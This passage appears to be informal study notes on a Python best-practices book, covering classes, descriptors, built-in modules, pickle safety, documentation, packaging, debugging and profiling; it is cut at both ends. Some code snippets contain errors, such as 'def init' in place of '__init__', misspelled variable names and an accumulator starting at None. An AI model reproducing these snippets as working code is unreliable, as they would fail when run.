were given Classes and Inheritance# Python supports inheritance (acquiring attribute and methods from a parent class), polymorphism (A way for multiple classes to implement their own unique versions of a method) and encapsulation (Restricting direct access to an objects attributes and methods) Prefer Helper functions over bookkeeping with tuples and dictionaries# When a class is getting very complex with many dictionaries and tuples within then it time to use classes, a hierachy of classes. This is a common problem when scope increases (at first you didn’t know you had to keep track of such and such). It is important to remember that more than one layer of nesting is a problem. • Avoid dictionaries that contain ditionaries • It makes your code hard to read • It makes maintenance difficult Breaking it into classes: • helps create well defined interfaces encapsulating data • A layer of abstraction between your interfaces and your concrete implementations Extending tuples is also an issue, as associating more data now cause an issue with calling code. A namedtuple in the collections module does exactly what you need…defining a tiny immutable data class. Limitations of namedtuple: • You cannot specify default argument values. With a handful of optional values a class is a better choice. • Attributes are still accessible by numerical indices and iteration A complete example: Grade = collections.namedtuple('Grade', ('score', 'weight')) class Subject(object): def __init__(self): self._grades = [] def report_grade(self, score, weight): self._grades.append(Grade(score, weight)) def average_grade(self): total, total_weight = 0, 0 for grade in self._grades: total += grade.score * grade.weight total_weight += grade.weight return total / total_weight class Student(object): def __init__(self): self._subjects = {} def subject(self, name): if name not in self._subjects: self._subjects[name] = Subject() return self._subjects[name] def average_grade(self): total, count = 0, 0 for subject in self._subjects.values(): total += subject.average_grade() count += 1 return total / count class Gradebook(object): def __init__(self): self._students = {} def student(self, name): if name not in self._students: self._students[name] = Student() return self._students[name] Usage: book = Gradebook() albert = book.student('Albert Einstein') math = albert.subject('Math') math.report_grade(80, 0.10) print(albert.average_grade()) >>> 80.0 It may have become longer but it is much easier to read Accept Functions for Simple Interfaces Instead of Classes# Python’s built-in API’s let you customise behavious by passing in a function. Like the list, sort function that takes a key argument to determine the order. Ordering by length: names = ['Socrates', 'Archimedes', 'Plato', 'Aristotle'] names.sort(key=lambda x: len(x)) print(names) >>> ['Plato', 'Socrates', 'Aristotle', 'Archimedes'] Functions are ideal for hooks as tehy are easier to describe and simpler to define than classes. Ie. better than using Abstract Class • Functions are often all you need to interact(interface) between simple components • The __call__ special method enables instances of a class to behave like plain old python functions • When you need a function to maintain state consider providing a class that provides a __call__ Refer to the book for more information… Use @classmethod Polymorphism to construct methods generically# Polymorphism is a way for multiple classes in a hierachu to implement their own unique version of a method. This allows many classes to fulfill the same interface or abstract base class while providing different functionality Say you want a common class to represent input data for a MapReduce function, you create a common class to represent this. class InputData(object): def read(self): raise NotImplementedError THere is one version of a concrete subclass that reads from a file on disk: class PathInputData(InputData): def __init__(self, path): self.path = path def read(self): return open(self.path).read() Now you could also have a class that reads from the network Now we want a similar setup for a MapReduce worker to consume input data in a standard way class Worker(object): def init(self, input_data): self.input_data = input_data self.result = None def map(self): raise NotImplementedError def reduce(self, other): raise NotImplementedError Remember a concrete class is a class where all methods are completely implemented. An abstract class is one where functions are not fully defined (An abstract of a class). The concrete subclass of Worker: class lineCountWorker(Worker): def map(self): data = self.input_data.read() self.data = data.count('\n') def reduce(self, other): self.result += other.result Now the big hurdle…What connects these pieces? I have a set of classes with reaonable abstractions and interfaces, but they are only useful once the class is constructed. What is responsible for building the objects and orchestrating the map reduce? We can manually build this with helper functions: def generate_inputs(data_dir):     for name in os.listdir(data_dir):         yield PathInputData(os.path.join(data_dir, name)) def create_workers(input_list):     workers = []     for input_data in input_list:         workers.append(LineCountWorker(input_data))     return workers def execute(workers):     threads = [Thread(target=w.map) for w in workers]     for thread in threads: thread.start()     for thread in threads: thread.join()     first, rest = workers[0], workers[1:]     for worker in rest:         first.reduce(worker)     return first.result def mapreduce(data_dir):     inputs = generate_inputs(data_dir)     workers = create_workers(inputs)     return execute(workers) There is a big problem here. The functions are not generic at all. If you write a different type of InputData or Worker subclass you would have to rewrite all of these functions. This boils down to needing a generic way to construct objects. In other languages you could solve this problem with constructor polymorphism, making each subclass of InputData have a special constrcutor that can be used generically. The problem is that python only has a single constructor method: __init__. It is unreasonable to require each subclass to have a compatible constructor. The best way to solve this is with: @classmethod polymorphism This polymorphism extends to whole classes, not just their constructed objects. class GenericInputData(object): def read(self): raise NotImplementedError @classmethod def generate_inputs(cls, config): raise NotImplementedError generate_inputs takes a dictionary of configuration parameters than the concrete class must interpret. class PathInputData(GenericInputData): def init(self, path): self.path = path def read(self): return open(self.path).read() @classmethod def generate_inputs(cls, config): data_dir = config['data_dir'] for name in os.listdir(data_dir): yield cls(os.path.join(data_dir, name)) Similarly, I can make the create_workers helper part of the GenericWorker class. Here, I use the input_class parameter, which must be a subclass of GenericInputData, to generate the necessary inputs. I construct instances of the GenericWorker concrete subclass using cls() as a generic constructor. class GenericWorker(object):     # ...     def map(self):         raise NotImplementedError     def reduce(self, other):         raise NotImplementedError     @classmethod     def create_workers(cls, input_class, config):         workers = []         for input_data in input_class.generate_inputs(config):             workers.append(cls(input_data))         return workers The call to input_class.generate_inputs is the class polymorphism. Also the cls(input_data) provides an alternate way to instantiate instead of using __init__ directly. We can then just change the parent class: class LineCountWorker(GenericWorker): ... and finally rewrite mapreduce to be more generic: def mapreduce(worker_class, input_class, config): workers = worker_class.create_workers(input_class, config)     return execute(workers) Calling the function now requires more parameters: with TemporaryDirectory() as tmpdir:     write_test_files(tmpdir)     config = {'data_dir': tmpdir}     result = mapreduce(LineCountWorker, PathInputData, config) Initialise Parent classes with Super# Calling the parent class __init__ mthod can ead to unpredictable behaviour espescially with multiple inheritance as the __init__. Python 2.2 introduced super and set the MRO - Method Resolution Order. Python 3 introduced super with no arguments and it should be used because it is clear, concise and always does the right thing. Use Multiple Inheritance Only for Mix-in utility Classes# Python makes multi-inheritance possible and traceable, but is better to avoid it altogether. If you want the encapsultion and convenience of multiple inheritance, use a mixin instead. A mixin is a small utility class that only defines a set of additional methods a class should provide. Mixin classses don’t define their own instance attributes and don’t require their __init__ constructor to be called. Example: you want the ability to convert a python object from its in-memory representation to a dictionary ready for serialisation. class ToDictMixin(object): def to_dict(self): return self._traverse_dict(self.__dict__) def _traverse_dict(self, instance_dict): output = {} for key, value in instance_dict.items(): output[key] = self._traverse(key, value) return output def _traverse(self, key, value): if isinstance(value, ToDictMixin): return value.to_dict() elif isinstance(value, dict): return self._traverse_dict(value) elif isinstance(value, list): return [self._traverse(key, i) for i in value] elif hasattr(value, '__dict__'): return self._traverse_dict(value.__dict__) else: return value Using it: class BinaryTree(ToDictMixin):     def __init__(self, value, left=None, right=None):         self.value = value         self.left = left         self.right = right tree = BinaryTree(10, left=BinaryTree(7, right=BinaryTree(9)), right=BinaryTree(13, left=BinaryTree(11)) ) print(tree.to_dict()) The mixin methods can also be overriden. Alot more to read on this in the book… Prefer public attributes of private ones# In python there are only 2 attribute visibility types: private and public. class MyObject(object): def __init__(self): self.public_field = 5 self.__private_field = 10 def get_private_field(self): return self.__private_field Public attribues can be accessed with dot notation: my_obj = MyObject() print(my_obj.public_field) Private fields start with a double underscore __ and can be accessed by methods of the containing class. print(my_obj.get_private_field()) Directly accessing a private atrribute gives an error: print(my_obj.__private_field) >>> AttributeError: 'MyObject' object has no attribute '__private_field' • Class methods can access private attributes because they are declared within the class block] • A subclass cannot access it’s parent classes private fields The python compiler just does a check on the calling class name, thereforethis works: class MyChildObject(MyObject): pass print(my_child_obj.get_private_field()) >>> 10 but if MyChildObject held the get_private_field() method it would fail. If you look at the __dict__ of a object you can see parent attributes: (Pdb) my_child_obj.__dict__ {'public_field': 5, '_MyObject__private_field': 10} and accessing them is easy: print(my_child_obj._MyObject__private_field) Why isn’t visibility restricted? The python motto: “We are all consenting adults here.” The benfits of being open outweigh the downsides of being closed. To minimise the damage of accessing internals unknowingly follow the PEP8 naming conventions. Fields prefixed with underscore(_protected_fields) are protected meaning external users of the class should proceed with caution. By choosing private fields you are making subclass overrides and extensions cumbersome and brittle. Then if these private references will break due to the hierachy changing. It is better to allow subclasses to do more by using _protected attributes. Make sure to document their importance and that they be treated as immutable. Inherit from collections.abc for custom Container Types# Much of python is defining classes, data and how they relate. Each python class is a container of some kind. Oftentimes when creating a sequence you will extend (inherit from) list. But what about a BinaryTree that you want to allow indexing for, that isn’t a list but is similar. class BinaryNode(object):     def init(self, value, left=None, right=None):         self.value = value         self.left = left         self.right = right You can access an item with obj.__getitem__(0) ie. obj[0] class IndexableNode(BinaryNode):     def _search(self, count, index):         # …         # Returns (found, count) def getitem(self, index):         found, _ = self._search(0, index)         if not found:             raise IndexError(‘Index out of range’)         return found.value But then you would also need implementations of __len__, count and index You should use an abstract base class (abc) from collections: from collections.abc import Sequence Then once you implement the __gettitem__ and __len__ the other methods come for free. • You can still inherit directly from python’s container types list and dict for simple cases Metaclasses and Attributes# Metaclass let you intercept python’s class statement to provide special behviour each time it is defined. Remember to follow the rule of least surprise Use Plain attributes instead of Get and Set Methods# These can be done in python and may be seen as good to: • encapsulate functionality • validate usage • define boundaries In python, you never need to do this. Always start with simle public attributes. If you need special behaviour you can us @property and the setter method. This also helps to add validation and type checking. class BoundedResistance(Resistor):     def __init__(self, ohms):         super().__init__(ohms)     @property     def ohms(self):         return self._ohms     @ohms.setter     def ohms(self, ohms):         if ohms <= 0:             raise ValueError('%f ohms must be > 0' % ohms)         self._ohms = ohms Don’t set other attributes in getter property methods. Only modify related object state in setters If you are doing something slow and complex, rather do it in a normal method. People are expecting this to behave like a property. Consider @property Instead of Refactoring Attributes# “One advanced but common use of @property is transitioning what was once a simple numerical attribute into an on-the-fly calculation” Check the book for a good example… • Use @propertyto give existing instance attributes new functionality • Make incremental progress towards better data models • Consider refactoring a class when using a @property too regularly Use Descriptors for reusable @property methods# The big problem with @property is reuse. The methods it decorates cannot be reused for multiple attributes in the same class or external classes. Take the example: class Exam(object):     def __init__(self):         self._writing_grade = 0         self._math_grade = 0     @staticmethod     def _check_grade(value):         if not (0 <= value <= 100):             raise ValueError('Grade must be between 0 and 100') @property     def writing_grade(self):         return self._writing_grade     @writing_grade.setter     def writing_grade(self, value):         self._check_grade(value)         self._writing_grade = value     @property     def math_grade(self):         return self._math_grade     @math_grade.setter     def math_grade(self, value):         self._check_grade(value)         self._math_grade = value We are duplicating properies and the grade validations. The better way to do this is to use a descriptor, that describes how attribute access is interpreted by the language. * Provide __get__ and __set__ methods to reuse grade validation behaviour. * They are better than mixins at this because you can reuse the same logic for many attributes in the same class. The class implementing descriptor: class Grade(object):     def __get__(*args, **kwargs):         # ...     def __set__(*args, **kwargs):         # ... The exam: class Exam(object):     # Class attributes     math_grade = Grade()     writing_grade = Grade()     science_grade = Grade() Assigning properties: exam = Exam() exam.writing_grade = 40 # Which is really Exam.__dict__['writing_grade'].__set__(exam, 40) Retrievingproperties: print(exam.writing_grade) # Which is really print(Exam.__dict__['writing_grade'].__get__(exam, Exam)) In short, when an Exam instance doesn’t have an attribute named writing_grade, Python will fall back to the Exam class’s attribute instead. If this class attribute is an object that has __get__ and __set__ methods, Python will assume you want to follow the descriptor protocol. There are still many gotchas here you can go through in the book… Use getattr, getattribute, and setattr for Lazy Attributes# Read the book… Validate subclasses with Meta Classes# • Use metaclasses to ensure that subclasses are well formed at the time they are defined, before objects of their type are constructed. • The __new__ method of metaclasses is run after the class statement’s entire body has been processed. Register Class Existence with Metaclasses# Hectic topic…read the book Annotate Class Attributes with Metaclasses# Again…hectic Concurrency and Parrallelism# Concurrency is when a computer does many different things seemingly at the same time. Interleaving execution of a program making it seem like it is all being done the same time. Parallelism is actually doing many different things at the same time. Concurrency provides no speedup for the total work. These topics are a bit too hectic for now… you are welcome to read the book…I will leave the headings here Use Subprocess to manage Child processes# Read full details in the book… Use Threads for Blocking I/O, Avoid Parrallelism# Read full details in the book… Use Lock to Prevent Data Races in Threads# Read full details in the book… Use Queue to Coordinate Work between Threads# Read full details in the book… Consider Coroutines to Run Many Functions Concurrently# Read full details in the book… Consider concurrent.futures for True Parrallelism# Read full details in the book…Item 41 Built-in Modules# Python takes a batteries included approach to the standard library. Some of these built-in modules are closely intertwined with idiomatic python they may as well be part of the language specification. Define Function Decorators with functools.wraps# Decorators have the ability to run additional code before or after any calls to the function they wrap. This allows them to access and modify input arguments and return values. Say you want to print aruments and return values for a recursive function call: def trace(func): '''Decorator to display input arguments and return value''' def wrapper(*args, **kwargs): result = func(*args, **kwargs) print(f'{ func.__name__ }({ args },{ kwargs }) -> { result}') return result return wrapper You can apply this function with the @ symbol @trace def fibonacci(n): '''Return the n-th fibonacci number''' if n in (0, 1): return 1 return fibonacci(n-1) + fibonacci(n-2) The @ symbol is equivalent to calling: fibonacci = trace(fibonacci) Testing it: result = fibonacci(3) print(result) gives: fibonacci((1,),{}) -> 1 fibonacci((0,),{}) -> 1 fibonacci((2,),{}) -> 2 fibonacci((1,),{}) -> 1 fibonacci((3,),{}) -> 3 3 There is however an unintended side effect, the function returned does not think it is called fibonacci. print(fibonacci) <function trace.<locals>.wrapper at 0x108a0fbf8> The trace function returns the wrapper it defines. The wrapper function is what is assigned to the fibonacci name with the decorator. The problem is that is undermines debuggers and object serialisers. For example the help is useless: >>> from test import fibonacci >>> help(fibonacci) Help on function wrapper in module test: wrapper(*args, **kwargs) The solution is to use the wraps helper function from the functools built-in module. This is a decorator that helps you write decorators Applying it to wrapper copies the important metadata about the innner function to the outer function. The important part below is @wraps(func) from functools import wraps def trace(func): '''Decorator to display input arguments and return value''' @wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) ... Now help() works well In [1]: from test import fibonacci In [2]: help(fibonacci) Help on function fibonacci in module test: fibonacci(n) Return the n-th fibonacci number Consider contextlib and with statements for reuasable try/finally behaviour# The with statement in python is used to indicate when code is running in a special context. lock = Lock() with lock:     print('Lock is held') is equivalent to: lock.acquire() try:     print('Lock is held') finally:     lock.release() The with is better asit eliminates the need to write repetitive code. It’s easy to make your objects and functions capable of use in with statements by using the contextlib built-in module. This module contains the contextmanager decorator, which lets a simple function be used in with statements. This is much easier than defining a new class with the special methods __enter__ and __exit__ (the standard way). There is more information in the book…Item 43 Make pickle reliable with copyreg# The pickle built in module can serialize python objects into a strema of bytes and deserialise back into python objects. Pickle byte streams houldn’t be used to communicate between untrusted parties. The purpose of pickle is to communicate between 2 programs you control over binary channels. The pickle module’s serialization format is unsafe by design. The serialized data contains what is essentially a program that describes how to reconstruct the original Python object. This means a malicious pickle payload could be used to compromise any part of the Python program that attempts to deserialize it. In contrast, the json module is safe by design. Serialized JSON data contains a simple description of an object hierarchy. Deserializing JSON data does not expose a Python program to any additional risk. Formats like JSON should be used for communication between programs or people that don’t trust each other. Say you have a class tracking the state of a game for a player: class GameState(object): '''Track the state of you game''' def __init__(self): self.level = 0 self.lives = 4 You use and save the state of a player: state = GameState() state.level += 1 state.lives -= 1 state_path = '/tmp/game_state.bin' with open(state_path, 'wb') as f: pickle.dump(state, f) You can later resume the game state with: state_path = '/tmp/game_state.bin' with open(state_path, 'rb') as f: state_after = pickle.load(f) print(state_after.__dict__) But what if you add a new field to the state class? Serialising and deserialising a GameState instance will work but resuming the old state will not have the points attribute. Even though the instance is of the GameState type. Fixing these issues requires copyreg Default attribute values# You can set default attribute values: def __init__(self, lives=4, level=0, points=0): ... To use this constuctor for pickling, create a helper function that takes a GameState object and turns it into a tuple of parameters for the copyregmodule. The returned tuple contains the function and paramters to use when unpickling: def pickle_game_state(game_state): kwargs = game_state.__dict__ return unpickle_game_state, (kwargs,) Now I need unpickle_game_state that takes serialised data and parameters and returns a GameState object def unpickle_game_state(kwargs): return GameState(**kwargs) Now register them with copyreg: import copyreg, pickle copyreg.pickle(GameState, pickle_game_state) Unfortunately this worked for new objects, but did not work for me when deserialising the old saved pickle file. The unpickle_game_state function was not run. There is more info in the book on versioning of classes and providing stable import paths… Use datetime instead of local clocks# UTC Coordinated Universal Time is the standard timezone independent representation of time. It is good for computers but not great for humans as they need a reference point. Use datetime with the help of pytz for conversions. The old time module should be avoided. The time module# The localtime function from the time built-in module lets you convert unix time (from epock in seconds) to local time of the home computer. from time import localtime, mktime, strftime, strptime now = 1407694710 local_tuple = localtime(now) time_format = '%Y-%m-%d %H:%M:%S' time_str = strftime(time_format, local_tuple) print(time_str) time_tuple = strptime(time_str, time_format) utc_now = mktime(time_tuple) print(utc_now) >>> 2014-08-10 20:18:30 >>> 1407694710.0 The problem comes when converting time to other timezones. The time module uses the host platform/operating system and this has different formats and missing timezones. If you must use time, only use it for converting unixtime to the local pc time, in all other times use datetime The datetime module# You can use datetime to convert a time to your local timezone: now = datetime.datetime(2014, 8, 10, 18, 18, 30) now_utc = now.replace(tzinfo=datetime.timezone.utc) now_local = now_utc.astimezone() print(now_local) Datetime lets you change timezones but it does not hold the definitions of the rules for the timezones. Enter pytz pytz holds the timezone information of every timezone you might need. To use pytz effectively always convert first to UTC then to the target time. Top tip, you can get all timezones with: pytz.all_timezones In this example I convert a sydney flight arrivcal time into utc (note all these calls are required): import datetime import pytz time_format = '%Y-%m-%d %H:%M:%S' arrival_sydney = '2014-05-01 05:33:24' sydney_dt_naive = datetime.datetime.strptime(arrival_sydney, time_format) sydney = pytz.timezone('Australia/Sydney') sydney_dt = sydney.localize(sydney_dt_naive) utc_dt = pytz.utc.normalize(sydney_dt.astimezone(pytz.utc)) print(utc_dt) >>> 2014-04-30 19:33:24+00:00 Now I can convert that UTC time to Johannesburg time: jhb_timezone = pytz.timezone('Africa/Johannesburg') jhb_dt = jhb_timezone.normalize(utc_dt.astimezone(jhb_timezone)) print(jhb_dt) >>> 2014-04-30 21:33:24+02:00 Use Built-in algorithms and data structures# When implementing programs with non-trivial amounts of data eventually you see slowdowns. Most likely due to you not using the most suitable alorithms and data structures. On top of speed, these algorithms also make life easier. Double Ended Queue# The deque class from the collections module is a double ended queue. Ideal for a FIFO (First in, firsdt out) queue from collections import deque fifo = deque() fifi.append(1) x = fife.popleft() list also contains a sequence of items, you can insert or remove items from the end in constant time. Inserting and removing items from the head of the list takes liner time O(n) and constant time for a deque O(1) Ordered Dictionary# Standard dictionaries are unordered. Meaning the same dict can have different orders of iteration. The OrderedDict class from the collections module is a special type of dictionary that keeps track of the order keys were inserted. Iteracting through it has predictable behaviour. a = OrderedDict() a['one'] = 1 a['two'] = 2 b = OrderedDict() b['one'] = 'red' b['two'] = 'blue' for number, colour in zip(a.values(), b.values()): print(number, colour) Default Dictionary# USeful for bookeeping and tracking statistics. With dictionaries you cannot assume a key is present, making it difficult to increase a counter for example: stats = {} key = 'my_counter' if key not in stats: stats['key'] = 0 stats['key'] += 1 defaultdict automatically stores a default value when a key does not exist, all you need to do is to provide a function for when a key does not exist. In this case int() == 0 from collections import defaultdict stats = defaultdict(int) stats['my_counter'] += 1 Heap Queue# Heaps are useful for maintaining a priority queue. The heapq module provides functions for creating heaps in standard list types with functions like heappush, heappop amd nsmallest. Remember items are always removed with highest priority first (lowest number): a = [] heapq.heappush(a, 5) heapq.heappush(a, 3) heapq.heappush(a, 7) heapq.heappush(a, 4) print( heapq.heappop(a), heapq.heappop(a), heapq.heappop(a), heapq.heappop(a) ) Accessing the list with list[0] always returns the smallest item: assert a[0] == nsmallest(1, a)[0] == 3 Calling the sort method on the list maintains the heap invariant. print('Before:', a) a.sort() print('After: ', a) >>> Before: [3, 4, 7, 5] After:  [3, 4, 5, 7] list takes linear time, heap sort logarithmic. Bisection# Search for an item in a list takes linear time proportional to it’s length when you call the index method. The bisect module’s function bisect_left provides an efficient binary search through a sequence of srted items. The value it returns is the insertion point of the value into the sequence. x = list(range(10**6)) i = x.index(991234) i = bisect_left(x, 991234) Teh binay search is logarithmic. Iterator Tools# itertools contains a large number of functions for organising and interacting with iterators. There are 3 main categories: 1. Linking iterators together * chain - Combines multiple iteractors into a single sequential iterator * cycle - Repeat’s an iterators items forever * tee - Splits a single iterator into multiple parrallel iterators * zip_longest - zip for iterators of differing lengths 2. Filtering * islice - slices an iteractor by numerical indexes without copying * takewhile - returns items from an iteractor while predicate condition is true * dropwhile - returns items from an iteractor when previous function returns False he first time * filterfalse - Returns items from iteractor when predicate function returns false 3. Comnbinations * product - returns cartesian product of items from an iterator * permutations - returns ordered permutations of length N with items from an iterator * combination - returns ordered combinations of length N with unrepeated items from an iterator Use decimal when precision is paramount# rate = 1.45 seconds = 3*60 + 42 cost = rate * seconds / 60 print(cost) print(round(cost, 2)) With floating point math and rounding down you get: 5.364999999999999 5.36 This wont do. The Decimal class provides fixed point math of 28 decimal points by default. It gives you more precision and control over rounding. from decimal import Decimal, ROUND_UP rate = Decimal('1.45') seconds = Decimal('222')  # 3*60 + 42 cost = rate * seconds / Decimal('60') print(cost) rounded = cost.quantize(Decimal('0.01'), rounding=ROUND_UP) print(rounded) Gives: 5.365 5.37 Using the quantize method this way also properly handles the small usage case for short, cheap phone calls. So it still returns 0 if it is zero, but 001 if it is 0.000000000001. Know where to find Community built modules# Python has a central repo of modules called pypi, that are maintained by the community. Collaboration# There are language features in python to help you construct well defined API’s with clear interface boundaries. The python community has established best practices that maximise the maintainability over time. You need to be deliberate in your collaboration goal. Write docstrings for every function, class and module# Documentation is very important due to the dynamic nature of the language. Unlike other languages the documentation from source is available when a program runs. You can add documentation imeediately after the def statement of a function: def palindrom(word): '''Return True if the given word is a palindrome''' return word == word[::-1] You can retrive the docstring with: print(repr(palindrom.__doc__)) Consequences: • Makes interactive development easier with ipython and using the help function • A standard way of defining documentation makes it easier to build tools to convert it into more appealing formats like html: Like sphinx or readthedocs • First class, accessible and good looking documentation encourages people to write it Documenting Modules# Each module should ahve a top level doc string. #!/usr/bin/env python3 '''Single sentence describing modules purpose The paragraphs that follow should contain details that all users should know about It is a good place to highlight important features: - - Usage information for command line utilities ''' Documenting Classes# Each class should have a docstring highlighting public attributes and methods, along with guidance on interating with protected attributes etc. eg. class Player(object):     """Represents a player of the game.     Subclasses may override the 'tick' method to provide     custom animations for the player's movement depending     on their power level, etc.     Public attributes:     - power: Unused power-ups (float between 0 and 1).     - coins: Coins found during the level (integer).     ""” Documenting Functions# Every public method and function should have a docstring. Similar to other docstrings with arguments at the end. eg. def find_anagrams(word, dictionary):     """Find all anagrams for a word.     This function only runs as fast as the test for     membership in the 'dictionary' container. It will     be slow if the dictionary is a list and fast if     it's a set.     Args:         word: String of the target word.         dictionary: Container with all strings that             are known to be actual words.” Returns:         List of anagrams that were found. Empty if         none were found.     """ • If your function has no arguments and a simple return value, a single sentence description is probably good enough. • If your function uses *args and **kwargs use documentation to describe their purpose. • Default values should be mentioned • Generators should describe what the generator yields Use packages to organise modules and provide stable APIs# As the size of a codebase grows it is natural to reogranise its structure into smaller functions. You may find yourself with so many modules that another layer is needed. For that python provides packages which are modules containing other modules. In most cases packages are created by putting a __init__.py file into a directory. Once that is present you can import modules from that package: main.py mypackage/__init__.py mypackage/models.py mypackage/utils.py in main.py: from mypackage import utils Namespaces# Packages let you divide modules into seperate namespaces. from analysis.utils import inspect as analysis_inspect from frontend.utils import inspect as frontend_inspect When functions have the same name you can imports them as a different name Even better is to avoid the as altogether and access the function with the package.module.function way Stable API# Python provides a strict, stable API for external consumers. You will want to provide stable functionality that does not change between releases. Say you want all functions in my_module.utils and my_module.models to be accessible via my_module. You can, add a __init__.py: __all__ = [] from . models import * __all__ += models.__all__ from . utils import * __all__ += utils.__all__” in utils.py: from . models import Projectile __all__ = ['simulate_collision'] ... in models.py: __all__ = ['Projetile', ] class Projectile: ... Try avoid using import * as they can overwrite names existing in your module and they hide the source fo names of functions to new readers Define a root exception to insulate callers from APIs# Python has a built-in hierarchy of exceptions for the language and standard library. There’s a draw to using the built-in exception types for reporting errors instead of defining your own new types Sometimes raising a ValueError makes sense but it is much more powerful for an API to define its own hierachy of exceptions. # my_module.py class Error(Exception):     """Base-class for all exceptions raised by this module.""" class InvalidDensityError(Error):     """There was a problem with a provided density value.""” Having a root exception lets consumers of your API catch exceptions you raise on purpose. eg: We are specifically catching the my_module.Error try:     weight = my_module.determine_weight(1, -1) except my_module.Error as e:     logging.error('Unexpected error: %s', e) These root exceptions: • Let callers know there is a problem with the usage of the API • If an exception is not caught properly it will propagate all the way up to an except - bringing attention to the consumer (Catching the Python Exception base class can help you find bugs) • They help find bugs in your API code - so other exeptions (non-root) are one’s you did not intend to raise • Futureproof’s API when expanding class NegativeDensityError(InvalidDensityError): """A provided density value was negative.""" ... The calling code will still work as it catches the parent InvalidDensityError Know How to Break Circular Dependencies# When collaborating with others you will have a mutual independency between modules. You have a dialog module, importing app: import app class Dialog(object):     def __init__(self, save_dir):         self.save_dir = save_dir     # ... save_dialog = Dialog(app.prefs.get('save_dir')) def show():     # ... The app modules contains a prefs object that also imports the dialog class: import dialog class Prefs(object):     # ...     def get(self, name):         # ... prefs = Prefs() dialog.show() It is a circular dependency if you try to use the app module you will get: AttributeError: 'module' object has no attribute 'prefs' So how does python’s import work?…In dept first order: 1. Searches for your module in sys.path 2. Loads the code and ensures it compiles 3. Creates corresponding empty module object 4. Inserts the module into sys.modules 5. Runs the code in the module object to define its contents The attributes of a module aren’t defined until the code runs in step 5. But a module can be loaded immediately after it is inserted into sys.modules The app module imports dialog. The dialog module imports app. app.prefs raises the error because app is just an empty shell at this point. The best way to fix this is to ensure that prefs is at the bottom of the dependency tree. Here are 3 approaches to breaking the circular dependency: Reordering Imports# Import dialog at the bottom of app: class Prefs(object):     # ... prefs = Prefs() import dialog  # Moved dialog.show() This will avoid the AttributeError but it goes agianst PEP8 Import, COnfigure, Run# Have modules minimise side effects at import time. Have modules only define functions, classes and constants Avoid running any functions at import time. Then each module provides a configure function once all other modules have finished importing. dialog.py: import app class Dialog(object):     # ... app.py: import dialog class Prefs(object):     # ... prefs = Prefs() def configure():     # ... main.py: import app import dialog app.configure() dialog.configure() dialog.show() Then your main.py should: 1. Import 2. Configre 3. Run This can make your code harder to read but will allow for the dependency injection design pattern. Dynamic Import# The simplest is to use an import statement in a function. A dynamic import as the importing is done when the program is running. dialog.py: class Dialog(object):     # ... save_dialog = Dialog() def show():     import app  # Dynamic import It requires no structural changes to the way modules are defined and imported. There are downsides: the cost can be bad espescially inside loops, by delaying execution there may be surprising failures at runtime. Use Virtual Environments for isolated and reproducible Deendencies# Potencially use pipenv in this case… Production# Consider Module-scoped code to configure deployment environments# When putting things into production you have to rely on database configurations and these can be handled by your module, take a test and produciton database. You can override parts of your program at startup time to provide different functionality: dev_main.py: TESTING = True import db_connection db = db_connection.Database() prod_main.py: TESTING = False import db_connection db = db_connection.Database() The only difference is the value of TESTING Then in your code you can decide which db to use with: db_connection.py import __main__ class TestingDatabase(object):     # ... class RealDatabase(object):     # ... if __main__.TESTING:     Database = TestingDatabase else:     Database = RealDatabase Once your deployment environments get complicated, you should consider moving them out of Python constants (like TESTING) and into dedicated configuration files. Tools like the configparser built-in module let you maintain production configurations separate from code, a distinction that’s crucial for collaborating with an operations team. Another example is if you know your program works differently based on the host platform, you can inspect the sys module. db_connection.py: import sys class Win32Database(object):     # ... class PosixDatabase(object):     # ... if sys.platform.startswith('win32'):     Database = Win32Database else:     Database = PosixDatabase You can also get environment variables with: os.environ Use repr Strings for Debugging Output# print will get you surprisingly far when debugging. The problem is that these human readable results don’t show the type. >>> print('5') 5 >>> print(5) 5 You always want to see the repr version which is the printable representation of an object. >>> print(repr('5')) '5' >>> print(repr(5)) 5 The repr of a class is not partocularly helpful although if you have control of th class you can define your own __repr__ method to display the object: class BetterClass(object):     def __init__(self, x, y):         # ...     def __repr__(self):         return 'BetterClass(%d, %d)' % (self.x, self.y) When you don’t hve control over the class you can check the object’s instance dictionary with obj.__dict__ Test Everything with unittest# So many people don’t do this (you should start with the test) • Python doesn’t have static type checking, so the compiler doesn’t stop the program when types are wrong. • You don’t knwo whether functions will be defined at runtime. This is a blessing by most python dev’s because of the productivity gained from the brevity and simplicity. Also type safety isn’t everything and code needs to be tested. You should always test your code no matter what language it is written in. In python the only way to have any confidence in your code is to write tests, there is no veil of static type checking to make you feel safe. Tests are easy to write in python due to the same dynamic features like easily overridable behaviours. Tests are insurance, giving you confidence your code is correct but also making it harder for future modification and refactoring to burden functionality. The simplesdt way to write a tesdt is by using unittest. See more on writing Unit Tests For more advance testing libraries see pytest and nose Consider Interactive Debugging with pdb# Everyone encounters bugs. Writing tests isolates code but does not help you find the root cause of issues. You should use pythons built-in interactive debugger Other programming languages make you put a breakpoint on a certain line. The python debugger differs in that you directly initiate the debugger in the code. All you need to do is add: import pdb; pdb.set_trace() def complex_func(a, b, c):     # ...     import pdb; pdb.set_trace() As soon as the statement runs, execution is paused and you can inspect local variables. You can use locals, help and import. inspecting current state: • bt - Print the traceback of the current execution stack • up - Move the scope up, to caller of current function • down - Move scope down one level on function call Resuming execution: • step - Run the program till the next line stopping in next function called • next - Run the next line, do not stop when the next function is called • return - Run the program until the current function returns • continue - continue running until the next breakpoint. Profile Before Optimising# Slowdowns can be obscure. The best thing to do is ignore intuition and directly measure the performance of a program before you try optimise it. Python provides a built in profiler. Lets try it on this insertion sort: from random import randint max_size = 10**4 data = [randint(0, max_size) for _ in range(max_size)] test = lambda: insertion_sort(data) def insertion_sort(data): result = [] for value in data: insert_value(result, value) return result def insert_value(array, value): for i, existing in enumerate(array): if existing > value: array.insert(i, value) return array.append(value) Python provides profile in pure python and cProfile a C-extension with low overhead. Ensure to only test the portion of the code you have control over, not external systems. import cProfile from pstats import Stats profiler = cProfile.Profile() profiler.runcall(test) stats = Stats(profiler) stats.strip_dirs() stats.sort_stats('cumulative') stats.print_stats() Results: $ python test.py 20003 function calls in 2.167 seconds Ordered by: cumulative time ncalls tottime percall cumtime percall filename:lineno(function) 1 0.000 0.000 2.167 2.167 test.py:198(<lambda>) 1 0.004 0.004 2.167 2.167 test.py:181(insertion_sort) 10000 2.142 0.000 2.163 0.000 test.py:188(insert_value) 9988 0.020 0.000 0.020 0.000 {method 'insert' of 'list' objects} 12 0.000 0.000 0.000 0.000 {method 'append' of 'list' objects} 1 0.000 